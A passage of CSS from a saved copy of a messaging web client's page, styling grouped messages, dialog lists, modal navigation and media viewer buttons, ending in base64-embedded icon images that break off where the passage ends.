  3703. .im_message_selected.im_grouped_short .im_message_views_wrap,
  3704. .im_message_selected.im_grouped_fwd .im_message_views_wrap,
  3705. .im_message_selected.im_grouped_fwd_short .im_message_views_wrap {
  3706. display: block;
  3707. }
  3708. .im_message_selected.im_grouped .im_message_views_wrap,
  3709. .im_message_selected.im_grouped_fwd .im_message_views_wrap {
  3710. width: auto;
  3711. }
  3712. .im_message_views {
  3713. right: 0;
  3714. font-size: 0.85em;
  3715. top: 3px;
  3716. }
  3717. .im_grouped .im_message_views,
  3718. .im_grouped_fwd .im_message_views {
  3719. top: 19px;
  3720. }
  3721. .im_message_fwd .im_message_views {
  3722. top: 3px;
  3723. }
  3724. .im_grouped_short .im_content_message_wrap {
  3725. margin: 6px 10px 6px 16px;
  3726. }
  3727. .im_grouped_short:last-child .im_content_message_wrap {
  3728. margin-bottom: 8px;
  3729. }
  3730. @media (min-width: 901px) {
  3731. .im_message_wrap {
  3732. position: relative;
  3733. }
  3734. }
  3735. .im_message_author {
  3736. margin: 1px 0 4px;
  3737. display: inline-block;
  3738. }
  3739. /* Groupings */
  3740. .im_message_fwd_from {
  3741. margin-top: 5px;
  3742. }
  3743. .im_grouped .im_message_fwd_from {
  3744. margin-top: 0;
  3745. }
  3746. .im_message_fwd {
  3747. margin-top: 4px;
  3748. margin-bottom: 4px;
  3749. }
  3750. .im_grouped_short .im_message_author_wrap,
  3751. .im_grouped_short .im_message_from_photo,
  3752. .im_grouped .im_message_author_wrap,
  3753. .im_grouped .im_message_from_photo,
  3754. .im_grouped_fwd .im_message_author_wrap,
  3755. .im_grouped_fwd .im_message_from_photo,
  3756. .im_grouped_fwd_short .im_message_author_wrap,
  3757. .im_grouped_fwd_short .im_message_from_photo {
  3758. display: none;
  3759. }
  3760. .im_grouped_short .im_message_body,
  3761. .im_grouped .im_message_body,
  3762. .im_grouped_fwd .im_message_body,
  3763. .im_grouped_fwd_short .im_message_body {
  3764. margin-left: 57px;
  3765. }
  3766. .im_grouped_fwd .im_message_fwd_from,
  3767. .im_grouped_fwd_short .im_message_fwd_from {
  3768. display: none;
  3769. }
  3770. .im_grouped_short .im_message_fwd .im_message_meta,
  3771. .im_grouped .im_message_fwd .im_message_meta,
  3772. .im_grouped_fwd .im_message_fwd .im_message_meta,
  3773. .im_grouped_fwd_short .im_message_fwd .im_message_meta {
  3774. display: none;
  3775. }
  3776. .im_grouped_fwd_short .im_message_fwd {
  3777. margin-top: 8px;
  3778. }
  3779. .tooltip-inner {
  3780. background: rgba(0, 0, 0, 0.8);
  3781. }
  3782. .tooltip-arrow {
  3783. opacity: 0.8;
  3784. }
  3785. .im_dialogs_scrollable_wrap a.im_dialog {
  3786. padding: 7px 16px;
  3787. }
  3788. .im_dialogs_scrollable_wrap .active a.im_dialog {
  3789. margin-right: -2px;
  3790. padding-right: 18px;
  3791. }
  3792. .im_dialog_photo {
  3793. width: 48px;
  3794. height: 48px;
  3795. border-radius: 50%;
  3796. overflow: hidden;
  3797. }
  3798. div.im_dialog_photo {
  3799. margin-right: 15px;
  3800. }
  3801. div.im_dialog_photo .peer_initials {
  3802. line-height: 48px;
  3803. font-size: 18px;
  3804. }
  3805. .im_dialog_message {
  3806. margin-top: 5px;
  3807. }
  3808. .im_dialog_peer {
  3809. margin-top: 3px;
  3810. margin-bottom: 3px;
  3811. }
  3812. .active .im_dialog_date,
  3813. .active a.im_dialog:hover .im_dialog_date,
  3814. .active a.im_dialog_selected .im_dialog_date {
  3815. color: #fff;
  3816. }
  3817. /* Import contact modal */
  3818. .import_contact_modal_window .modal-dialog {
  3819. max-width: 480px;
  3820. }
  3821. .modal-content-animated {
  3822. -webkit-transition: margin-top linear 0.2s;
  3823. transition: margin-top linear 0.2s;
  3824. }
  3825. .countries_modal_search {
  3826. padding: 12px 12px 12px;
  3827. margin: 0;
  3828. position: relative;
  3829. }
  3830. .countries_modal_col {
  3831. max-height: 350px;
  3832. }
  3833. .countries_modal_wrap .md_modal_body {
  3834. padding-bottom: 15px;
  3835. }
  3836. .modal_close {
  3837. width: 20px;
  3838. height: 21px;
  3839. float: right;
  3840. margin: 43px 40px 0 0;
  3841. opacity: 0.5;
  3842. pointer-events: none;
  3843. -webkit-transition: 0.2s;
  3844. -moz-transition: 0.2s;
  3845. -o-transition: 0.2s;
  3846. transition: 0.2s;
  3847. background-image: /*savepage-url=../img/icons/PhotoIcons.png*/ url();
  3848. background-repeat: no-repeat;
  3849. background-position: -10px -10px;
  3850. }
  3851. .is_2x .modal_close {
  3852. background-image: /*savepage-url=../img/icons/PhotoIcons_2x.png*/ url();
  3853. background-size: 40px 200px;
  3854. }
  3855. .modal_close_wrap {
  3856. display: none;
  3857. cursor: pointer;
  3858. position: fixed;
  3859. top: 0;
  3860. right: 0;
  3861. width: 50%;
  3862. height: 100%;
  3863. }
  3864. .modal_close_wrap:hover .modal_close {
  3865. opacity: 1;
  3866. }
  3867. .modal_close_wrap_wnext {
  3868. width: 104px;
  3869. height: 150px;
  3870. }
  3871. .modal_prev_wrap,
  3872. .modal_next_wrap {
  3873. display: none;
  3874. position: fixed;
  3875. top: 0;
  3876. left: 0;
  3877. bottom: 64px;
  3878. width: 104px;
  3879. }
  3880. .modal_next_wrap {
  3881. left: auto;
  3882. right: 0;
  3883. }
  3884. .modal_prev,
  3885. .modal_next {
  3886. width: 16px;
  3887. height: 24px;
  3888. opacity: 0.15;
  3889. position: absolute;
  3890. top: 50%;
  3891. pointer-events: none;
  3892. margin: 0 0 0 38px;
  3893. -webkit-transition: 0.2s;
  3894. -moz-transition: 0.2s;
  3895. -o-transition: 0.2s;
  3896. transition: 0.2s;
  3897. background-image: /*savepage-url=../img/icons/PhotoIcons.png*/ url();
  3898. background-repeat: no-repeat;
  3899. background-position: -12px -41px;
  3900. }
  3901. .is_2x .modal_prev,
  3902. .is_2x .modal_next {
  3903. background-image: /*savepage-url=../img/icons/PhotoIcons_2x.png*/ url();
  3904. background-size: 40px 200px;
  3905. }
  3906. .modal_next {
  3907. margin: 0 0 0 50px;
  3908. background-position: -14px -75px;
  3909. }
  3910. .modal_prev_active_wrap {
  3911. cursor: pointer;
  3912. }
  3913. .modal_prev_active_wrap .modal_prev {
  3914. opacity: 0.5;
  3915. }
  3916. .modal_prev_active_wrap:hover {
  3917. background-color: rgba(0, 0, 0, 0.2);
  3918. }
  3919. .modal_prev_active_wrap:hover .modal_prev {
  3920. opacity: 1;
  3921. }
  3922. .modal_next_active_wrap {
  3923. cursor: pointer;
  3924. }
  3925. .modal_next_active_wrap .modal_next {
  3926. opacity: 0.5;
  3927. }
  3928. .modal_next_active_wrap:hover {
  3929. background-color: rgba(0, 0, 0, 0.2);
  3930. }
  3931. .modal_next_active_wrap:hover .modal_next {
  3932. opacity: 1;
  3933. }
  3934. @media (min-width: 800px) {
  3935. .modal_close_wrap,
  3936. .modal_next_wrap,
  3937. .modal_prev_wrap {
  3938. display: block;
  3939. }
  3940. }
  3941. .media_modal_bottom_panel {
  3942. max-width: 1000px;
  3943. margin: 0 auto;
  3944. color: rgba(255, 255, 255, 0.6);
  3945. position: relative;
  3946. }
  3947. .media_modal_bottom_panel_wrap {
  3948. position: fixed;
  3949. bottom: 0;
  3950. left: 0;
  3951. right: 0;
  3952. height: 64px;
  3953. background: #313131;
  3954. }
  3955. .media_modal_title_wrap {
  3956. max-width: 300px;
  3957. margin: 0 auto;
  3958. text-align: center;
  3959. font-size: 13px;
  3960. font-weight: bold;
  3961. line-height: 16px;
  3962. padding: 24px 0;
  3963. overflow: hidden;
  3964. white-space: nowrap;
  3965. text-overflow: ellipsis;
  3966. }
  3967. .media_modal_info_wrap {
  3968. line-height: 16px;
  3969. padding: 15px 16px;
  3970. width: 200px;
  3971. position: absolute;
  3972. left: 0;
  3973. }
  3974. .media_modal_author_photo {
  3975. width: 32px;
  3976. height: 32px;
  3977. border-radius: 50%;
  3978. overflow: hidden;
  3979. }
  3980. .media_modal_author_photo .peer_initials {
  3981. line-height: 32px;
  3982. }
  3983. a.media_modal_author_photo {
  3984. margin: 1px 10px 1px 0;
  3985. }
  3986. div.media_modal_author_name {
  3987. font-size: 13px;
  3988. margin-top: 1px;
  3989. overflow: hidden;
  3990. white-space: nowrap;
  3991. text-overflow: ellipsis;
  3992. }
  3993. .media_modal_date,
  3994. a.media_modal_date:hover {
  3995. font-size: 11px;
  3996. color: rgba(255, 255, 255, 0.4);
  3997. }
  3998. div.media_modal_date {
  3999. margin-top: 2px;
  4000. overflow: hidden;
  4001. white-space: nowrap;
  4002. text-overflow: ellipsis;
  4003. }
  4004. .media_modal_wrap .modal-body {
  4005. padding: 16px;
  4006. }
  4007. .embed_modal_wrap .modal-body {
  4008. line-height: 0;
  4009. padding: 0;
  4010. }
  4011. .photo_modal_window,
  4012. .video_modal_window,
  4013. .document_modal_window {
  4014. padding: 0;
  4015. }
  4016. .video_modal_window .modal-body {
  4017. padding: 0;
  4018. }
  4019. .media_modal_bottom_actions {
  4020. position: absolute;
  4021. right: 0;
  4022. }
  4023. .media_modal_action_btn {
  4024. float: left;
  4025. display: block;
  4026. width: 68px;
  4027. height: 64px;
  4028. }
  4029. .media_modal_action_btn:hover {
  4030. background: rgba(0, 0, 0, 0.2);
  4031. }
  4032. .media_modal_action_btn i {
  4033. display: block;
  4034. opacity: 0.5;
  4035. background-image: /*savepage-url=../img/icons/PhotoIcons.png*/ url();
  4036. background-repeat: no-repeat;
  4037. background-position: 0 0;
  4038. }
  4039. .is_2x .media_modal_action_btn i {
  4040. background-image: /*savepage-url=../img/icons/PhotoIcons_2x.png*/ url();
  4041. background-size: 40px 200px;
  4042. }
  4043. .media_modal_action_btn:hover i {
  4044. opacity: 1;
  4045. }
  4046. .media_modal_action_btn i.media_modal_action_btn_download {
  4047. background-position: -12px -163px;
  4048. width: 16px;
  4049. height: 20px;
  4050. margin: 22px 26px;
  4051. }
  4052. .media_modal_action_btn i.media_modal_action_btn_forward {
  4053. background-position: -9px -109px;
  4054. width: 23px;
  4055. height: 15px;
  4056. margin: 24px 22px;
  4057. }
  4058. .media_modal_action_btn i.media_modal_action_btn_delete {
  4059. background-position: -13px -135px;
  4060. width: 14px;
  4061. height: 18px;
  4062. margin: 23px 27px;
  4063. }
  4064. </style><style type="text/css">ogvjs { display: inline-block; position: relative; user-select: none; }
  4065. </style>
  4066. <style id="savepage-cssvariables">
  4067. :root {
  4068. --savepage-url-3: url(data:image/png;base64,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);
  4069. --savepage-url-4: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA2MiAxNCI+PGcgdHJhbnNmb3JtPSJ0cmFuc2xhdGUoLTMyLjQ2My0xMTguNjcpIiBmaWxsPSIjZmZmIj48cGF0aCBkPSJtMzIuNDYzIDExOC42N2g4LjY1NnYxLjYxN2gtMy40djkuMDhoLTEuODcydi05LjA4aC0zLjM4NXYtMS42MTciLz48cGF0aCBkPSJtNDUuNzgzIDEyNC44MWMtLjAyLS4yNy0uMDgtLjUyOS0uMTgtLjc3OS0uMDktLjI1LS4yMi0uNDY0LS4zODktLjY0NC0uMTYtLjE5LS4zNTktLjMzOS0uNTk5LS40NDktLjIzLS4xMi0uNDg5LS4xOC0uNzc5LS4xOC0uMyAwLS41NzQuMDU1LS44MjQuMTY1LS4yNC4xLS40NDkuMjQ1LS42MjkuNDM0LS4xNy4xOC0uMzEuMzk0LS40MTkuNjQ0LS4xLjI1LS4xNTUuNTE5LS4xNjUuODA5aDMuOTg0bS0zLjk4NCAxLjEyM2MwIC4zLjA0LjU4OS4xMi44NjkuMDkuMjguMjIuNTI0LjM4OS43MzRzLjM4NC4zNzkuNjQ0LjUwOWMuMjYuMTIuNTY5LjE4LjkyOS4xOC40OTkgMCAuODk5LS4xMDUgMS4xOTgtLjMxNC4zMDktLjIyLjUzOS0uNTQ0LjY4OS0uOTczaDEuNjE3Yy0uMDkuNDE5LS4yNDUuNzk0LS40NjQgMS4xMjMtLjIyLjMyOS0uNDg0LjYwOS0uNzk0LjgzOS0uMzEuMjItLjY1OS4zODQtMS4wNDguNDk0LS4zNzkuMTItLjc3OS4xOC0xLjE5OC4xOC0uNjA5IDAtMS4xNDgtLjEtMS42MTctLjMtLjQ2OS0uMi0uODY5LS40NzktMS4xOTgtLjgzOS0uMzE5LS4zNTktLjU2NC0uNzg5LS43MzQtMS4yODgtLjE2LS40OTktLjI0LTEuMDQ4LS4yNC0xLjY0NyAwLS41NDkuMDg1LTEuMDY4LjI1NS0xLjU1OC4xOC0uNDk5LjQyOS0uOTM0Ljc0OS0xLjMwMy4zMjktLjM3OS43MjQtLjY3OSAxLjE4My0uODk5LjQ1OS0uMjIuOTc4LS4zMjkgMS41NTctLjMyOS42MDkgMCAxLjE1My4xMyAxLjYzMi4zODkuNDg5LjI1Ljg5NC41ODQgMS4yMTMgMSAuMzE5LjQxOS41NDkuOTA0LjY4OSAxLjQ1My4xNS41MzkuMTkgMS4wOTguMTIgMS42NzdoLTUuNjkxIi8+PHBhdGggZD0ibTQ4Ljg0OCAxMTguNjdoMS43MDd2MTAuNjkzaC0xLjcwN3YtMTAuNjkzIi8+PHBhdGggZD0ibTU3LjcxNyAxMjQuODFjLS4wMi0uMjctLjA4LS41MjktLjE4LS43NzktLjA5LS4yNS0uMjItLjQ2NC0uMzg5LS42NDQtLjE2LS4xOS0uMzU5LS4zMzktLjU5OS0uNDQ5LS4yMy0uMTItLjQ4OS0uMTgtLjc3OS0uMTgtLjMgMC0uNTc0LjA1NS0uODI0LjE2NS0uMjQuMS0uNDQ5LjI0NS0uNjI5LjQzNC0uMTcuMTgtLjMxLjM5NC0uNDE5LjY0NC0uMS4yNS0uMTU1LjUxOS0uMTY1LjgwOWgzLjk4NG0tMy45ODQgMS4xMjNjMCAuMy4wNC41ODkuMTIu